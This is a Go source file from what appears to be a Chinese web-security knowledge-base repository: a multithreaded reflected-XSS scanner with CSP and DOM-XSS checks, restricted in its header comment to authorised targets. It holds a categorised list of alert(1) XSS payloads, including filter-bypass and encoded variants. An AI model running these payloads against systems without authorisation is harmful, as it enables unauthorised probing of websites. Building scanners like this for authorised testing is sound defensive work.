hao/websafe-kb
1
0
派生 0
代码 工单 合并请求 1 工作流 软件包 项目 发布 百科 活动
文件
d0120fbf10b28a65ddc0915b6c43bd2a27b96c21
websafe-kb/02-xss/tools/xss-scanner.go

295 行
7.5 KiB
Go
原始文件 Blame 文件历史

// xss-scanner.go - 高性能 XSS 批量扫描工具
//
// 授权边界:
// - 仅用于自有资产、测试环境或已明确授权的目标
// - 允许公网验证,但必须确认资产归属或授权关系
// - 不面向无授权第三方网站或泛互联网枚举
package main
import (
"flag"
"fmt"
"io"
"net/http"
"net/url"
"regexp"
"strings"
"sync"
"time"
)
type XSSResult struct {
URL string
Payload string
Type string
Category string
}
type XSSScanner struct {
Client *http.Client
Threads int
Timeout time.Duration
Payloads map[string][]string
}
var (
colorRed = "\033[91m"
colorGreen = "\033[92m"
colorYellow = "\033[93m"
colorBlue = "\033[94m"
colorCyan = "\033[96m"
colorBold = "\033[1m"
colorEnd = "\033[0m"
)
func NewXSSScanner(threads int, timeout time.Duration) *XSSScanner {
return &XSSScanner{
Client: &http.Client{
Timeout: timeout,
CheckRedirect: func(req *http.Request, via []*http.Request) error {
return http.ErrUseLastResponse
},
},
Threads: threads,
Timeout: timeout,
Payloads: map[string][]string{
"basic": {
"<script>alert(1)</script>",
"<script>alert('XSS')</script>",
"<img src=x onerror=alert(1)>",
"<svg onload=alert(1)>",
"<body onload=alert(1)>",
},
"event_handlers": {
"\"onfocus=alert(1) autofocus=",
"\"onmouseover=alert(1)//",
"\"onclick=alert(1)//",
"\"onerror=alert(1)//",
"\"onload=alert(1)//",
},
"tag_injection": {
"<img src=x onerror=alert(1)//",
"<svg/onload=alert(1)//",
"<video src=x onerror=alert(1)>",
"<details open ontoggle=alert(1)>",
"<marquee onstart=alert(1)>",
},
"filter_bypass": {
"<ScRiPt>alert(1)</ScRiPt>",
"<SCRIPT>alert(1)</SCRIPT>",
"<script >alert(1)</script >",
"<script\x00>alert(1)</script>",
},
"encoding": {
"%3Cscript%3Ealert(1)%3C/script%3E",
"&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;",
},
},
}
}
func (s *XSSScanner) SendRequest(targetURL, method, param, payload string) (string, error) {
var req *http.Request
var err error
if method == "GET" {
u, _ := url.Parse(targetURL)
q := u.Query()
q.Set(param, payload)
u.RawQuery = q.Encode()
req, err = http.NewRequest("GET", u.String(), nil)
} else {
data := url.Values{}
data.Set(param, payload)
req, err = http.NewRequest("POST", targetURL, strings.NewReader(data.Encode()))
req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
}
if err != nil {
return "", err
}
req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36")
resp, err := s.Client.Do(req)
if err != nil {
return "", err
}
defer resp.Body.Close()
body, _ := io.ReadAll(resp.Body)
return string(body), nil
}
func (s *XSSScanner) ScanURL(targetURL, method, param string) []XSSResult {
var results []XSSResult
var mu sync.Mutex
var wg sync.WaitGroup
sem := make(chan struct{}, s.Threads)
for category, payloads := range s.Payloads {
for _, payload := range payloads {
wg.Add(1)
go func(cat, p string) {
defer wg.Done()
sem <- struct{}{}
defer func() { <-sem }()
body, err := s.SendRequest(targetURL, method, param, p)
if err != nil {
return
}
if strings.Contains(body, p) || strings.Contains(body, url.QueryEscape(p)) {
mu.Lock()
results = append(results, XSSResult{
URL: targetURL,
Payload: p,
Type: "Reflected XSS",
Category: cat,
})
mu.Unlock()
fmt.Printf("%s[VULN]%s [%s] %s - %s\n",
colorRed+colorBold, colorEnd, cat, param, p[:min(50, len(p))])
}
}(category, payload)
}
}
wg.Wait()
return results
}
func (s *XSSScanner) CheckCSP(targetURL string) map[string]interface{} {
result := map[string]interface{}{
"has_csp": false,
"csp": "",
"weaknesses": []string{},
}
resp, err := s.Client.Get(targetURL)
if err != nil {
return result
}
defer resp.Body.Close()
csp := resp.Header.Get("Content-Security-Policy")
if csp != "" {
result["has_csp"] = true
result["csp"] = csp
weaknesses := []string{}
if strings.Contains(csp, "unsafe-inline") {
weaknesses = append(weaknesses, "允许内联脚本 (unsafe-inline)")
}
if strings.Contains(csp, "unsafe-eval") {
weaknesses = append(weaknesses, "允许 eval (unsafe-eval)")
}
if strings.Contains(csp, "*") {
weaknesses = append(weaknesses, "使用通配符 (*)")
}
result["weaknesses"] = weaknesses
}
return result
}
func (s *XSSScanner) ScanDOMXSS(targetURL string) []map[string]string {
results := []map[string]string{}
resp, err := s.Client.Get(targetURL)
if err != nil {
return results
}
defer resp.Body.Close()
body, _ := io.ReadAll(resp.Body)
html := string(body)
patterns := map[string]string{
`document\.write\s*\([^)]*location`: "document.write with location",
`element\.innerHTML\s*=\s*[^;]*location`: "innerHTML with location",
`eval\s*\([^)]*location`: "eval with location",
`window\.location\.hash`: "location.hash usage",
}
for pattern, desc := range patterns {
matched, _ := regexp.MatchString(pattern, html)
if matched {
results = append(results, map[string]string{
"pattern": pattern,
"desc": desc,
})
}
}
return results
}
func min(a, b int) int {
if a < b {
return a
}
return b
}
func main() {
target := flag.String("u", "", "Target URL")
method := flag.String("m", "GET", "HTTP Method (GET/POST)")
param := flag.String("p", "q", "Parameter to test")
threads := flag.Int("t", 10, "Number of threads")
timeout := flag.Duration("timeout", 10*time.Second, "Request timeout")
checkCSP := flag.Bool("check-csp", false, "Check CSP headers")
domScan := flag.Bool("dom-scan", false, "Scan for DOM XSS")
flag.Parse()
if *target == "" {
fmt.Printf("%s[ERROR]%s Target URL is required. Use -u flag.\n", colorRed, colorEnd)
flag.Usage()
return
}
fmt.Printf("\n%s%s%s\n", colorBold, strings.Repeat("=", 60), colorEnd)
fmt.Printf("%sXSS Scanner (Go)%s\n", colorBold, colorEnd)
fmt.Printf("%s%s%s\n\n", colorBold, strings.Repeat("=", 60), colorEnd)
scanner := NewXSSScanner(*threads, *timeout)
fmt.Printf("%s[INFO]%s Target: %s\n", colorBlue, colorEnd, *target)
fmt.Printf("%s[INFO]%s Method: %s\n", colorBlue, colorEnd, *method)
fmt.Printf("%s[INFO]%s Parameter: %s\n", colorBlue, colorEnd, *param)
if *checkCSP {
fmt.Printf("\n%s[*]%s Checking CSP...\n", colorCyan, colorEnd)
cspResult := scanner.CheckCSP(*target)
if cspResult["has_csp"].(bool) {
fmt.Printf("%s[+]%s CSP configured: %s\n", colorGreen, colorEnd, cspResult["csp"].(string)[:min(100, len(cspResult["csp"].(string)))])
for _, w := range cspResult["weaknesses"].([]string) {
fmt.Printf("%s[-]%s Weakness: %s\n", colorYellow, colorEnd, w)
}
} else {
fmt.Printf("%s[-]%s No CSP configured!\n", colorYellow, colorEnd)
}
}
if *domScan {
fmt.Printf("\n%s[*]%s Scanning for DOM XSS...\n", colorCyan, colorEnd)
domResults := scanner.ScanDOMXSS(*target)
for _, r := range domResults {
fmt.Printf("%s[-]%s Potential DOM XSS: %s\n", colorYellow, colorEnd, r["desc"])
}
}
fmt.Printf("\n%s[*]%s Testing XSS payloads...\n", colorCyan, colorEnd)
results := scanner.ScanURL(*target, *method, *param)
fmt.Printf("\n%s%s%s\n", colorBold, strings.Repeat("=", 60), colorEnd)
fmt.Printf("%s[SUMMARY]%s Found %d XSS vulnerabilities\n", colorGreen, colorEnd, len(results))
for _, r := range results {
fmt.Printf(" - [%s] %s: %s\n", r.Category, r.Type, r.Payload[:min(50, len(r.Payload))])
}
fmt.Printf("%s%s%s\n\n", colorBold, strings.Repeat("=", 60), colorEnd)
}
在新工单中引用 查看 Git Blame 复制永久链接